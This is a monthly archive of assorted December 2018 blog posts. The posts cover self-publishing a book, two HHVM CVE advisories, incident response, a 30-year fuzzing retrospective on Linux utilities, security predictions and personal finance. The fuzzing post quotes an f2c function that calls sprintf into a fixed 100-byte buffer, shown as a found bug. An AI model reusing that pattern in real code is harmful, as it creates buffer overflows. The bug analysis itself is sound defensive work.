Monthly Archives: December 2018

Notes on Self-Publishing a Book

In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.

As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.

I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. 14 years is an eternity in the publishing world, and even in the last 5 years the economics and structure of book publishing have changed quite a bit.

To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We met prior to my interest in this book, because I had wondered about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.

By the end of 2017, Anna and I were ready to begin work on the book. I believe our first "commits" occurred in December 2017.

For this stretching book project, I knew my strengths included organization, project management, writing to express another person's message, editing, and access to a skilled lead photographer. I learned that my co-author's strengths included subject matter expertise, a willingness to be photographed for the book's many pictures, and friends who would also be willing to be photographed.

None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.

Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.

After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.

I designed the structure of the book. As a former Air Force officer, I was comfortable with the "rule of threes," and brought some recent writing experience from my abandoned PhD thesis.

I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section -- something with Indian clubs, or kettle bells, or another supplement to stretching.

Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas -- tight hips, shoulders/back, and hamstrings. We encouraged the reader to "reach three goals" -- open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.

Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.

By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.

By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.

Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a "collector's edition" featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector's Edition. The second will be available at Amazon in January, and will feature black and white photographs.

While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)

Without revealing too much of the economic structure, I can say that it's much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.

Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.

The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.

In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.

The bottom line is that it's never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!

If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.

Update: Here is the Amazon listing.

Cross-posted from Rejoining the Tao Blog.

CVE-2018-6340 (hhvm)

The Memcache::getextendedstats function can be used to trigger an out-of-bounds read. Exploiting this issue requires control over memcached server hostnames and/or ports. This affects all supported versions of HHVM (3.30 and 3.27.4 and below).

NBlog Jan 1 – putting resilience on the agenda

Resilience means bending not breaking, surviving issues or incidents that might otherwise be disastrous. Resilient things aren’t necessary invulnerable but they are definitely not fragile. Under extreme stress, their performance degrades gracefully but, mostly, they just keep on going ... like we do.  

In the 15 years since we launched the NoticeBored service, we've survived emigrating to New Zealand, the usual ups and downs of business plus the Global Financial Crisis. Lately we're seeing an upturn in sales as customers release the strangle-holds on their awareness and training budgets ... and invest in becoming more resilient to survive future challenges.  

The following snippet from the Financial Conduct Authority's new report "Cyber and Technology Resilience" caught my beady eye in the course of researching and writing January's materials:

The NoticeBored service supplies top-quality creative content for security awareness and training programs on a market-leading range of topics, with parallel streams of material aimed at the workforce in general plus managers and professionals specifically. Getting all three audiences onto the same page and encouraging interaction is a key part of socializing information risk and security, promoting the security culture.

'Resilience' is the 189th NoticeBored awareness and training module and the 67th topic in our bulging portfolioIf your security awareness and training program is limited to basic topics such as viruses and passwords, with a loose assortment of materials forming an unsightly heap, it's no wonder your employees are bored stiff. A dull and uninspiring program achieves little value, essentially a waste of money. Furthermore if it only addresses "end users" and "cybersecurity" i.e. just IT security, again you're missing a trick. Resilience, for example, has profound implications for the entire business and beyond, with supply chains and stakeholders to consider. Resilient computing is just part of it.

For a highly cost-effective approach, read about January's NoticeBored security awareness and training module on resilience and get in touch to subscribe. I'm not just talking about the 'disappointing' 10% of financial companies apparently lacking an awareness program (!) but all organizations, including those of you who already get it and have something running. As we plummet towards 2020, seize the opportunity and ear-mark a tiny sliver of budget to energize your organization's approach to security awareness and training with NoticeBored. We're keen to help you toughen-up, making 2019 a happy, resilient and secure year ahead. Make security awareness your new year's resolution.

Happy new year!

New Year Tips from Security Professionals

New Year Tips from Security Professionals

Have you included website security as a part of your new year’s resolutions for 2019?

Here is a quick retrospective on tips some of our team members shared with us throughout the year.

The cost for neglecting security is 10 times greater than the effort to keep it safe. Your brand value takes 10 times as long to be recovered than to build it. Make sure to follow security best practices to protect your web assets.

Continue reading New Year Tips from Security Professionals at Sucuri Blog.

CVE-2018-6335 (hhvm)

A Malformed h2 frame can cause 'std::out_of_range' exception when parsing priority meta data. This behavior can lead to denial-of-service. This affects all supported versions of HHVM (3.25.2, 3.24.6, and 3.21.10 and below) when using the proxygen server to handle HTTP2 requests.

Incident Response In The Public Eye

Cyberattacks happen constantly. Every day organizations are attackers online whether they realize it or not. Most of these attacks are passing affairs. The mere fact that systems are on to the internet makes them a target of opportunity. For the most part, these attacks are non-events.

Security software, bugs in attack code, and updated applications stop most attacks. With 20 billion+ devices connected to the internet, it’s easy enough for the attack to move on.

But every couple of weeks there is a big enough attack to draw headlines. You’ve seen a steady stream of them over the past few years. 10 million records here, thousands of systems there, and so on.

When we talk about these attacks, for most people, it’s an abstract discussion. It’s hard to visualize an abstract set of data that lives online somewhere.

The recent attack on the Tribune Publishing network is different. This attack had a real world impact. Around the United States, newspapers arrived late and missing significant sections of content.


Late Thursday, some systems on the Tribune Publishing network were inaccessible. This is not an uncommon experience for anyone working in a large organization.

Technology has brought about many wonders but reliability isn’t typically one of them. When a system is inaccessible, it’s not out of the question to first think, “Ugh, this isn’t working. Call IT.”

Support tickets are often the first place cyberattacks show up…in retrospect. All public signs in the Tribune Publishing attack point this way. Once support realized the extent of the issue and that it involved malware, the event—a support request—turned into an incident. This kicks off an incident response (IR) process.

It’s this process that the teams at Tribune Publishing are dealing with now.


“Who is behind the attack?” Is the first question on everyone’s mind. It’s human nature—doubly so at a media organization—to want to understand the “who” and “why” as opposed to the “how”.

The reality is that for the incident response process, that’s a question that wastes time. The goal of the incident response process is to limit damage to the organization and to restore systems as fast as possible.

In that context, the response team only needs to roughly classify their attacker. Is the attacker:

  1. A low level cybercriminal who got lucky with an automated attack and has few resources to continue or sustain the attack?
  2. A cybercriminal intending on attacking a specific class of organization or systems?
  3. A cybercriminal targeting your organization?

Knowing which class of cybercriminal is behind the attack will help dictate the effort required in your response.

For a simple attack, your automated defences should take care of it. Even after an initial infection, a defence in depth strategy will isolate the attack and make recovery straight forward.

If the attack is part of a larger campaign (e.g., WannaCry, NotPeyta, etc.), incident response is more complex but the same principles hold true. The third class of attacker—specifically targeting your organization—is what causes a change in the process. Now you are defending against an adversary who is actively changing their approach. That requires a completely different mindset compared to other responses.

The Process

Incident response processes generally follow six stages:

  1. Prepare
  2. Identify
  3. Contain
  4. Eradicate
  5. Recover
  6. Learn

On paper the process looks simple. Preparation begins with teams gathering contact information, tools, and by writing out—or better yet, automating—procedures.

Once an incident has started, teams work to identify affected systems and the type of attack. They then contain the attack to prevent it from spreading. Then work to eradicate any trace of the attack.

Once the attack is over, the work shifts to recovering systems and data to restore functionality. Afterwards, an orderly review is conducted and lessons are shared about what worked and what didn’t.

Easy, right?

Any incident responders reading this post, can take a minute here having enjoyed a good laugh. The next section slams everyone back to the harsh reality of IR.


The six phases of incident response look great on paper but when you’re faced with implementing them in the real world, things never work out so cleanly.

The majority of a response is spent stuck in a near endless loop. Identifying new areas of compromises to try to contain the attack. Hopefully allowing responders to eradicate any foothold to recover the affected systems.

This is what most organizations struggle with. The time spent preparing is often insufficient because it’s all theoretical. Combined with the rapid pace of change on the network means that teams are struggling to keep up during an active incident.

With an organization like Tribune Publishing, things are even more difficult. By it’s very nature, it’s a 24/7 business with a wide variety of users around the country. This means there are a lot of systems to consider and each hour of downtime has a very real and significant impact on the bottom line.

As the incident progresses, the response team will make critical decision after critical decision. Shutting down various internal services to protect them. Changing network structures to isolate malicious activity. And a host of other challenges will pop up during the incident.

It’s difficult, hard driving work. Made doubly so with the eyes of senior management, customers, and the general public looking on.


As a CISO or incident response team leader, you need to focus on the IR process, not on attribution. That’s why it’s worrisome to see early attribution during an incident.

In the Tribune Publishing attack, it was publicly reported that the attack came from outside of the United State. This led to speculation around motivation. It’s likely that statement was based on the malware reportedly found and simple IP address information.

Early in the IR process, evidence like this will be found. It’s easily accessible but also highly unreliable. Malware is often sold in the digital underground and IP addresses are easily spoofed or proxied. The response team knows this but pressure from higher up may demand some form of answer…whether or not it helps resolve the situation.

The team must stay focused on resolving the incident, not spending valuable time and energy getting side tracked. Attribution has its place. It’s definitely not in the middle of the response to an incident.


The one hard truth of incident response is that nothing can substitute for experience. Given the—hopefully obvious—fact that you don’t actually want to be attacked, this leads to the concept of a game day or an active simulation.

Popular in cloud environments—AWS runs game days at their events—these exercises provide hands on experience. Usually held for the operations team, they are are of critical importance to the security team as well.

Security doesn’t operate in a vacuum, especially during an incident. Working with other teams during an incident is key. Practicing that way is a must. This type of work is a huge effort but one that will pay off significant when an organization is attacked.

Next Steps

Tribune Publishing was hit by a cyberattack with real world impact. This level of visibility is a stark reminder of how challenging these situations can be. The most critical phase of incident response is the first one: preparation.

As a CISO or senior security team member, you need to prepare not only the incident response plan. With a plan in hand, you need to get other teams on board and make it clear to senior management how this process works. Critical to success is making sure that management knows that the priority is recovery…not attribution.

Combine that with a lot of practice and when the next incident hits, you’ll have put your team in a reasonable position to respond and recover quickly.

The post Incident Response In The Public Eye appeared first on .

Fuzzing Like It’s 1989

With 2019 a day away, let’s reflect on the past to see how we can improve. Yes, let’s take a long look back 30 years and reflect on the original fuzzing paper, An Empirical Study of the Reliability of UNIX Utilities, and its 1995 follow-up, Fuzz Revisited, by Barton P. Miller.

In this blog post, we are going to find bugs in modern versions of Ubuntu Linux using the exact same tools as described in the original fuzzing papers. You should read the original papers not only for context, but for their insight. They proved to be very prescient about the vulnerabilities and exploits that would plague code over the decade following their publication. Astute readers may notice the publication date for the original paper is 1990. Even more perceptive readers will observe the copyright date of the source code comments: 1989.

A Quick Review

For those of you who didn’t read the papers (you really should), this section provides a quick summary and some choice quotes.

The fuzz program works by generating random character streams, with the option to generate only printable, control, or non-printable characters. The program uses a seed to generate reproducible results, which is a useful feature modern fuzzers often lack. A set of scripts execute target programs and check for core dumps. Program hangs are detected manually. Adapters provide random input to interactive programs (1990 paper), network services (1995 paper), and graphical X programs (1995 paper).

The 1990 paper tests four different processor architectures (i386, CVAX, Sparc, 68020) and five operating systems (4.3BSD, SunOS, AIX, Xenix, Dynix). The 1995 paper has similar platform diversity. In the first paper, 25-33% of utilities fail, depending on the platform. In the 1995 follow-on, the numbers range from 9%-33%, with GNU (on SunOS) and Linux being by far the least likely to crash.

The 1990 paper concludes that (1) programmers do not check array bounds or error codes, (2) macros make code hard to read and debug, and (3) C is very unsafe. The extremely unsafe gets function and C’s type system receive special mention. During testing, the authors discover format string vulnerabilities years before their widespread exploitation (see page 15). The paper concludes with a user survey asking about how often users fix or report bugs. Turns out reporting bugs was hard and there was little interest in fixing them.

The 1995 paper mentions open source software and includes a discussion of why it may have fewer bugs. It also contains this choice quote:

When we examined the bugs that caused the failures, a distressing phenomenon emerged: many of the bugs discovered (approximately 40%) and reported in 1990 are still present in their exact form in 1995. …

The techniques used in this study are simple and mostly automatic. It is difficult to understand why a vendor would not partake of a free and easy source of reliability improvements.

It would take another 15-20 years for fuzz testing to become standard practice at large software development shops.

I also found this statement, written in 1990 to be prescient of things to come:

Often the terseness of the C programming style is carried to extremes; form is emphasized over correct function. The ability to overflow an input buffer is also a potential security hole, as shown by the recent Internet worm.

Testing Methodology

Thankfully, after 30 years, Dr. Barton still provides full source code, scripts, and data to reproduce his results, which is a commendable goal that more researchers should emulate. The scripts and fuzzing code have aged surprisingly well. The scripts work as is, and the fuzz tool required only minor changes to compile and run.

For these tests, we used the scripts and data found in the fuzz-1995-basic repository, because it includes the most modern list of applications to test. As per the top-level README, these are the same random inputs used for the original fuzzing tests. The results presented below for modern Linux used the exact same code and data as the original papers. The only thing changed is the master command list to reflect modern Linux utilities.

Updates for 30 Years of New Software

Obviously there have been some changes in Linux software packages in the past 30 years, although quite a few tested utilities still trace their lineage back several decades. Modern versions of the same software audited in the 1995 paper were tested, where possible. Some software was no longer available and had to be replaced. The justification for each replacement is as follows:

  • cfecc1: This is a C preprocessor and equivalent to the one used in the 1995 paper.
  • dbxgdb: This is a debugger, an equivalence to that used in the 1995 paper.
  • ditroffgroff: ditroff is no longer available.
  • dtblgtbl: A GNU Troff equivalent of the old dtbl utility.
  • lispclisp: A common lisp implementation.
  • moreless: Less is more!
  • prologswipl: There were two choices for prolog: SWI Prolog and GNU Prolog. SWI Prolog won out because it is an older and a more comprehensive implementation.
  • awkgawk: The GNU version of awk.
  • ccgcc: The default C compiler.
  • compressgzip: GZip is the spiritual successor of old Unix compress.
  • lintsplint: A GPL-licensed rewrite of lint.
  • /bin/mail/usr/bin/mail: This should be an equivalent utility at a different path.
  • f77fort77: There were two possible choices for a Fortan77 compiler: GNU Fortran and Fort77. GNU Fortran is recommended for Fortran 90, while Fort77 is recommended for Fortran77 support. The f2c program is actively maintained and the changelog records entries date back to 1989.


The fuzzing methods of 1989 still find bugs in 2018. There has, however, been progress.

Measuring progress requires a baseline, and fortunately, there is a baseline for Linux utilities. While the original fuzzing paper from 1990 predates Linux, the 1995 re-test uses the same code to fuzz Linux utilities on the 1995 Slackware 2.1.0 distribution. The relevant results appear on Table 3 of the 1995 paper (pages 7-9). GNU/Linux held up very well against commercial competitors:

The failure rate of the utilities on the freely-distributed Linux version of UNIX was second-lowest at 9%.

Let’s examine how the Linux utilities of 2018 compare to the Linux utilities of 1995 using the fuzzing tools of 1989:

Ubuntu 18.10 (2018) Ubuntu 18.04 (2018) Ubuntu 16.04 (2016) Ubuntu 14.04 (2014) Slackware 2.1.0 (1995)
Crashes 1 (f77) 1 (f77) 2 (f77, ul) 2 (swipl, f77) 4 (ul, flex, indent, gdb)
Hangs 1 (spell) 1 (spell) 1 (spell) 2 (spell, units) 1 (ctags)
Total Tested 81 81 81 81 55
Crash/Hang % 2% 2% 4% 5% 9%

Amazingly, the Linux crash and hang count is still not zero, even for the latest Ubuntu release. The f2c program called by f77 triggers a segmentation fault, and the spell program hangs on two of the test inputs.

What Are The Bugs?

There are few enough bugs that I could manually investigate the root cause of some issues. Some results, like a bug in glibc, were surprising while others, like an sprintf into a fixed-sized buffer, were predictable.

The ul crash

The bug in ul is actually a bug in glibc. Specifically, it is an issue reported here and here (another person triggered it in ul) in 2016. According to the bug tracker it is still unfixed. Since the issue cannot be triggered on Ubuntu 18.04 and newer, the bug has been fixed at the distribution level. From the bug tracker comments, the core issue could be very serious.

f77 crash

The f77 program is provided by the fort77 package, which itself is a wrapper script around f2c, a Fortran77-to-C source translator. Debugging f2c reveals the crash is in the errstr function when printing an overly long error message. The f2c source reveals that it uses sprintf to write a variable length string into a fixed sized buffer:

errstr(const char *s, const char *t)
  char buff[100];
  sprintf(buff, s, t);

This issue looks like it’s been a part of f2c since inception. The f2c program has existed since at least 1989, per the changelog. A Fortran77 compiler was not tested on Linux in the 1995 fuzzing re-test, but had it been, this issue would have been found earlier.

The spell Hang

This is a great example of a classical deadlock. The spell program delegates spell checking to the ispell program via a pipe. The spell program reads text line by line and issues a blocking write of line size to ispell. The ispell program, however, will read at most BUFSIZ/2 bytes at a time (4096 bytes on my system) and issue a blocking write to ensure the client received spelling data processed thus far. Two different test inputs cause spell to write a line of more than 4096 characters to ispell, causing a deadlock: spell waits for ispell to read the whole line, while ispell waits for spell to acknowledge that it read the initial corrections.

The units Hang

Upon initial examination this appears to be an infinite loop condition. The hang looks to be in libreadline and not units, although newer versions of units do not suffer from the bug. The changelog indicates some input filtering was added, which may have inadvertently fixed this issue. While a thorough investigation of the cause and correction was out of scope for this blog post, there may still be a way to supply hanging input to libreadline.

The swipl Crash

For completeness I wanted to include the swipl crash. However, I did not investigate it thoroughly, as the crash has been long-fixed and looks fairly benign. The crash is actually an assertion (i.e. a thing that should never occur has happened) triggered during character conversion:

[Thread 1] pl-fli.c:2495: codeToAtom: Assertion failed: chrcode >= 0
C-stack trace labeled "crash":
  [0] __assert_fail+0x41
  [1] PL_put_term+0x18e
  [2] PL_unify_text+0x1c4

It is never good when an application crashes, but at least in this case the program can tell something is amiss, and it fails early and loudly.


Fuzzing has been a simple and reliable way to find bugs in programs for the last 30 years. While fuzzing research is advancing rapidly, even the simplest attempts that reuse 30-year-old code are successful at identifying bugs in modern Linux utilities.

The original fuzzing papers do a great job at foretelling the dangers of C and the security issues it would cause for decades. They argue convincingly that C makes it too easy to write unsafe code and should be avoided if possible. More directly, the papers show that even naive fuzz testing still exposes bugs, and such testing should be incorporated as a standard software development practice. Sadly, this advice was not followed for decades.

I hope you have enjoyed this 30-year retrospective. Be on the lookout for the next installment of this series: Fuzzing In The Year 2000, which will investigate how Windows 10 applications compare against their Windows NT/2000 equivalents when faced with a Windows message fuzzer. I think that you can already guess the answer.

The End (of 2018) Is Near: Looking Back for Optimism

Prognostication is risky business. Just days after I originally put together my list of 2019 predictions for the cybersecurity world of 2019, Marriott, Dell, Dunkin’ and Quora trashed my carefully crafted analysis.

This is further evidence that predicting events and issues based on unpredictable human behaviors is like picking your spouse on a blind date. Sure, you might be right, but you are just as likely to make a disastrous choice.

This time last year, I gazed deeply into my company’s Crystal Ball, read the tea leaves in my cup, and boldly predicted five circumstances. Three of them came true in full force:

  1. Government regulations would drive behaviors. The reaction to GDPR, NY DFS, CaCPA, CaSCD and serious talk of a US federal privacy law is proof that institutional behaviors are changing and will continue to do so.
  2. Patching will be the Achilles heel of applications. Known CVEs continued to the root cause of cyberattacks.
  3. More of the same problems as in previous years – a no brainer, unfortunately, since organizations still get caught doing stupid things (cough) Cathay Pacific (cough).

I’m claiming partial credit for the two other 2018 predictions: “Out-of-support software is the next frontier for attacks” and “IoT and Ransomware attacks will (still) be a threat” – and I’m updating them for 2019.

A list of 2019 predictions could easily include all of the same predictions as 2018, but that implies we are not making headway in solving the primary issues that security teams face every day. The reality is, though, we are making progress against cyberattacks. 

Despite the recent meme-inspiring breaches that added more than 600 million records to the wild, the number of breaches reported in 2018 will be down significantly for the first time since 2011. That didn’t happen by accident.

Businesses are accelerating efforts to take care of the root cause of most cyberattacks – known, but unpatched CVEs – in a more rapid and efficient manner. Research released late in 2018 proves it: 321 hours (or ~$20K) per week is spent (average) on patching CVEs; 30% of the most severe CVEs are patched within 30 days, a double digit improvement. 

The number of reported CVEs is also likely to finish the year flat to slightly down for the first time in four years based on stats from the National Vulnerability Database. This too is evidence that the testing tools and focus on improving the development process is working. Here again, automation has great potential to turn a one-year change in direction into a trend.

Progress, though, is not always linear or steady. While we wait to see if 2018 is a one-off or a movement, let’s look at what to expect in 2019. 

  1. Fewer data breaches… 
    If the current trends hold true to the end of 2018, we will see the first year-over-year drop in reported data losses since 2011. 

  2. …but bigger data losses.
    The number of security breaches may be down but, the size of data losses per attack is growing. Even adjusting for the 2017 Equifax and the 2018 Marriott breaches, the number of records lost per attack/breach will double in 2018. Expect that trend to continue into 2019.

  3. Unpatched vulnerabilities will get you media attention you don’t want.
    The latest numbers from The Ponemon Institute tells the story; security leaders around the world say that manual patching processes create risk – yet they continue to invest in headcount instead of automated tools like runtime virtual patchesthat can fix, not just patch, known code flaws with no downtime. Ponemon calls this the Patching Paraox.

  4. The security and compliance risks from Legacy Java applications only get bigger.
    Depending on whose measuring stick you use, Java 8 accounts for between 79 percent and 84 percent of Java-based applications, with a little more than 40 percent still being written in Java 6 or Java 7!  With no backwards compatibility in Java 11, enterprises with legacy apps (which is most organizations) face a dilemma – what to do with out-of-support, but mission critical applications?

  5. More of the same with a touch of “Huh?”
    In a world where SQL injection and Cross Site Scripting vulnerabilities continue to plague between 30 and 50 percent of all applications, we’re going to see more of the same in 2019.  But there will be surprises, too, says Captain Obvious. It could be that ransomware attacks will shift from primarily end-point vulnerabilities to server threats. Will we see a surge in DDoS attacks linked to the IoT after a year of relative calm in 2018?  And what about critical infrastructure attacks from for-profit hackers and Nation/States?

The Institute of Operations Management advises that “there are two types of forecasts: lucky or wrong.” Let’s reconvene in a year to see which we are.

About the author: James E. Lee is the Executive Vice President and Global CMO at Waratek. He was theformer CMO at data pioneer ChoicePoint and an expert in data privacy and security, having served nine years on the Board of the San Diego-based Identity Theft Resource Center including three years as Chair. Lee has served as a leader of two ANSI efforts to address issues of data privacy and identity management.

Copyright 2010 Respective Author at Infosec Island

Q&A: Experian exec says biometrics won’t save you from mobile hacks

If you think your new iPhone's Face ID facial recognition feature or your bank's fancy new fingerprint scanner will guarantee privacy and block hackers from accessing sensitive personal or financial data, think again.

In the coming year, cyberattacks will zero in on biometric hacking and expose vulnerabilities in touch ID sensors, facial recognition technology and passcodes, according to a new report from credit reporting agency Experian Plc. While biometric data is considered the most secure method of authentication, it can be stolen or altered, and sensors can be manipulated, spoofed or suffer deterioration with too much use.

Even so, as much as 63% of enterprises have implemented or plan to roll out  biometric authentication systems to augment or replace less-secure passwords, Experian said in its report. The push toward biometric systems dates back to the turn of the century in the financial services industry.

To read this article in full, please click here

10 Personal Finance Lessons for Technology Professionals

Presently sponsored by: Live Workshop! Watch the Varonis DFIR team investigate a cyberattack using our data-centric security stack

When you boil it down, what do those three things have in common? Those are choices.
Money is not peace of mind.
Money’s not happiness.
Money is, at its essence, that measure of a man’s choices.
10 Personal Finance Lessons for Technology Professionals

This is part of the opening monologue of the Ozark series and when I first heard it, I immediately stopped the show and dropped it into this blog post. It's a post that has been many years coming, one I started drafting about 5 years ago. One I kept dropping little bits and pieces into as the years went by but never finished because the time just wasn't right. It was only after reflecting on the responses to the following tweet that I decided to sit down and finally wrap up this post:

This is a measure of my choices. Of my wife's choices. Of a couple of decades of choices. The car itself is only one small part of that measure, but it was the enthusiasm that tweet was met with by many who expressed a desire to do the same one day that prompted me to finish the post. It's also the negativity expressed by a small few that I should choose to spend our money in this way that prompted me to finish it; those that feel success itself or its manifestation into physical goods is somehow taboo. The latter group won't get anything useful from this post, but it was never meant for them. It was always meant for those who wanted the measure of their own choices to look more like the one above.

So here it is - 10 Personal Financial Lessons for Technology Professionals.

Intro: This Industry Rocks!

I want to start here because this post is very specifically targeted at people working in the same industry as I do. There'll be many things which I hope are useful to those outside of that, but frankly, those of us in tech have a massive advantage when it comes to our ability to be financially successful. I don't just mean at the crazy rich end of the scale (4 of the world's top 10 richest people did it in tech - Bezos, Gates, Zuckerberg and Ellison), but at all levels of our profession. In fact, those guys are all pretty good examples of the ability to build amazing things from the ground up and I'm sure that many of you reading this have sat down and started building something with the same enthusiasm as, say, Zuckerberg did with Facebook in 2004. Of course, success at that level is exceptionally rare, but my point is that in this industry more than any other I can think of, we can create amazing things from very humble beginnings.

But of more relevance to most of us is the opportunities this industry affords the masses. It's one you can get involved in at almost any age (I started both my kids coding at 6 years old), it provides endless opportunities to learn for very little or even free (the vast majority of my own programming education has come via free online resources) and it transcends borders and socioeconomic barriers like few others (think of the opportunities it grants people in emerging markets). It's also up there with the highest paying industries around. I think we all know that innately but it's worth putting into raw numbers; I pulled a report from July put together by Australia's largest employment marketplace (SEEK) which has some great stats. For example, the ICT industry (Information, Communication, Technology) was the 5th highest paying with an average salary of $104,874 (dollars are Aussie, take off about 30% for USD). Number 1 is "Mining, Resources & Energy" which had a local boom here but is now rapidly declining (down 14% on the previous year). Take mining out of the picture and the top industry ("Consulting & Strategy"), pays only 5% more than tech. Look the other way down the list and the next highest industry is "Legal", a whole $9k a year behind. Banking is below that. Medical even lower.

Then there's this:

Today, the Information & Communication Technology (ICT) industry dominates, with salaries from six roles within the industry featuring in the top 20.

The highest salary SEEK has on the books is for architects (the tech kind, not the construction industry kind) at $138k. The third highest is tech industry management roles at $132k. Of course, actual numbers will differ in other parts of the world and indeed across other reports, plus there are many roles in the industry that will pay much less than those (especially during our earlier years). The point is that the tech industry provides people with near unparalleled earning potential across one's career. And it gives them the ability to do so much younger in life than many others do and with much less formal education; I care much more about skills than degrees in tech people, but my doctor / lawyer / pilot better have a heap of formal qualifications from many years of study behind them!

This is a cornerstone of what I'm going to write in this post: technology professionals have a much greater ability to earn more than most other industries and to do so at a young age. Being smart with that money early on gives them an opportunity to leverage it into even greater things again. Keep that in mind because I'll come back to it in lesson 2 but firstly, let's just be clear about why all this is important.

Lesson 1: Money Buys Choices

Let me be crystal clear about this in the very first lesson: money is not about owning a Ferrari and living in a mansion. It's not about expensive jewellery and designer clothes. No, money is about choices. It's about having choices such that you can decide to spend it on what's important to you. That may mean helping out family members, donating to local charities or retiring early so that you can spend more time with your partner and kids. And yes, if it's important to you, it may also mean spending it on luxury items and that's fine because that's your choice! It's a choice you get to make with money as opposed to one that is forced upon you without it.

Let me share some examples of what I mean from my own personal experiences and I hope they cover a broad enough spectrum to resonate with everyone in one way or another. Just over 2 years ago, my wife (Kylie) had spinal surgery. You can read her experiences in that post but in a nutshell, it wasn't much fun and it followed many months of pain due to disc degeneration. The choice that money gave us was to focus on her treatment and recovery without stressing about her needing to work. We said to each other many times "how on earth would we have dealt with this if she still had a full-time job?" and invariably the answer is always that we couldn't have: the job would have gone.

Kylie wasn't working when her back went because we chose not to. She left a very successful corporate role in late 2014 and very shortly after, my own corporate job was made redundant. We never really consciously decided that she shouldn't go back to work, but a series of events including her being fed up with corporate life and us deciding to move interstate meant that she never did (although she's continued consulting on an ad hoc basis). Money gave us that choice. It was a choice that meant one or both of us is always there for the kids in the morning, always waiting to pick them up after school and always there for every tennis match, friend's birthday party or other random kid thing that seems to happen on a near daily basis. Being able to make those choices has enabled us to spend more time together as a family. It's quite literally bought us family time in many different ways, particularly in recent years.

Which leads me to the "but money can't buy happiness" position so many people have repeated over the years. Bull. Shit. Anyone who has ever said that simply doesn't know where to shop. Putting aside the intangible things money buys such as those already covered above, money spent on physical items can bring people a huge amount of pleasure. I'm not a fashion guy (pick almost any talk I've done and you'll see it's jeans and t-shirts all the way), but I totally understand how presenting well can bring a lot of joy to people. Obviously I am a car guy and vehicles such as the one at the beginning of this post and the Nissan GT-R I bought back in 2013 have brought me enormous pleasure. I smile every time I drive either and the latter in particular has resulted in so many immensely enjoyable interactions with people; kids taking pictures, adults wanting to chat and without exception, positive responses from everyone who sees it. Now mind you, some of the most fun times I've had have been in previous cars a fraction of the price so I'm by no means trying to imply a direct correlation between cost and happiness, the point I'm making is simply that tangible items that cost money can bring a huge amount of happiness, but only if you have the choice to obtain them.

I'm very conscious of the fact that for some people, signs of wealth lead to resentment. There was some of that in response to the Mercedes tweet earlier on and in Australia, we'd refer to that as tall poppy syndrome. (I'm still at a loss as to why anyone would take the time to explicitly tell you how displeased they are with your happiness; some people just lose their minds when they're behind a keyboard.) I also touched on this when I first did my Hack Your Career talk in Norway last year where they refer to it as Janteloven (video embedded at the point where I describe it):

For the purposes of this first lesson, I don't care whether someone feels this way or not but regardless of your position, the one thing you should take away from this is that money enables you to choose what's important to you, whatever that may be. That's the mindset you need to take as you progress through this post.

Lesson 2: The Money You Earn Young is the Most Valuable Money You'll Ever Earn

Let's start with a graph and it's one you may have seen before, or at least some interpretation of the same sort of data:

10 Personal Finance Lessons for Technology Professionals

